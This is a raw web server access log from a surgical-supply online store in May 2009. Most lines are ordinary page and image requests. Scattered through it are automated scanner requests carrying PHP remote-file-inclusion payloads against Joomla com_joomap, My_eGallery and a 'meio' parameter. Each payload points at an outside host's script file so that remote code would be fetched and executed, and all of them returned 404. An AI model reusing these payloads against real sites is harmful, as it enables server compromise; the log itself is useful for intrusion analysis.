85.105.85.50 - - [12/May/2009:03:23:41 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:42 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:42 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:42 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:42 -0400] "GET /images/items/ALLOOSS1_THUMB.JPG HTTP/1.1" 200 30054 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:42 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
62.128.135.52 - - [12/May/2009:03:23:43 -0400] "GET /logs/access_log.Q109032500/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/May/2009:03:23:43 -0400] "GET /logs/error_log.Q109032500/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
85.105.85.50 - - [12/May/2009:03:23:43 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:43 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:43 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:43 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:44 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:44 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:45 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L504AD5488D50C800A44C04W+WSEQ(S0060):1+OUITEM(A0200):01107001 HTTP/1.1" 200 27013 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:46 -0400] "GET /images/items/ALLOOSS1_FULL.JPG HTTP/1.1" 200 252934 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L504AD5488D50C800A44C04W+WSEQ(S0060):1+OUITEM(A0200):01107001" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
66.249.72.114 - - [12/May/2009:03:23:58 -0400] "GET /images/items/store_sterile_section_over.jpg HTTP/1.1" 200 8414 "-" "Googlebot-Image/1.0"
85.105.85.50 - - [12/May/2009:03:23:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:23:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
62.128.135.52 - - [12/May/2009:03:23:59 -0400] "GET /logs/error_log.Q109011200/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/May/2009:03:23:59 -0400] "GET /logs/error_log.Q108111100/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
85.105.85.50 - - [12/May/2009:03:24:00 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:04 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:04 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:04 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:04 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:05 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:05 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
217.18.76.16 - - [12/May/2009:03:24:05 -0400] "GET /logs/access_log.Q109042500/index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:03:24:05 -0400] "GET /index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
85.105.85.50 - - [12/May/2009:03:24:05 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG HTTP/1.1" 200 46987 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD5488180C800EEAC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
217.18.76.16 - - [12/May/2009:03:24:06 -0400] "GET /logs/index.php?meio=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
85.105.85.50 - - [12/May/2009:03:24:06 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:07 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:07 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:07 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:07 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:07 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:07 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:08 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:08 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:08 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:08 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:08 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:08 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:09 -0400] "GET /images/items/CONFORM_THUMB.JPG HTTP/1.1" 200 1623 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:09 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:09 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:09 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:10 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:10 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:10 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:10 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:10 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:10 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:11 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L504AD5488D50C800A44C04W+WSEQ(S0060):1+OUITEM(A0200):5091520 HTTP/1.1" 200 27010 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:12 -0400] "GET /images/items/CONFORM_FULL.JPG HTTP/1.1" 200 6929 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L504AD5488D50C800A44C04W+WSEQ(S0060):1+OUITEM(A0200):5091520" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:25 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG HTTP/1.1" 200 45664 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD64C8E107800398C04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:27 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:27 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:28 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:28 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:28 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:28 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:28 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:28 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:29 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:29 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:29 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:29 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:29 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:29 -0400] "GET /images/items/5096000_THUMB.JPG HTTP/1.1" 200 2069 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:30 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:30 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L504AD6458FE058005CDC04W+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:31 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L504AD5488D50C800A44C04W+WSEQ(S0060):1+OUITEM(A0200):5096000 HTTP/1.1" 200 27010 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
85.105.85.50 - - [12/May/2009:03:24:32 -0400] "GET /images/items/5096000_FULL.JPG HTTP/1.1" 200 12686 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L504AD5488D50C800A44C04W+WSEQ(S0060):1+OUITEM(A0200):5096000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
62.128.135.52 - - [12/May/2009:03:24:38 -0400] "GET /logs/access_log.Q109031300/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.gitchigaming.com/.inv?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
110.45.144.106 - - [12/May/2009:03:24:45 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:24:45 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:24:45 -0400] "GET /logs/access_log.Q108100100%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:24:45 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:24:45 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:24:45 -0400] "GET /logs/access_log.Q108100100%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:24:45 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:24:45 -0400] "GET /logs/access_log.Q108100100%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:24:45 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
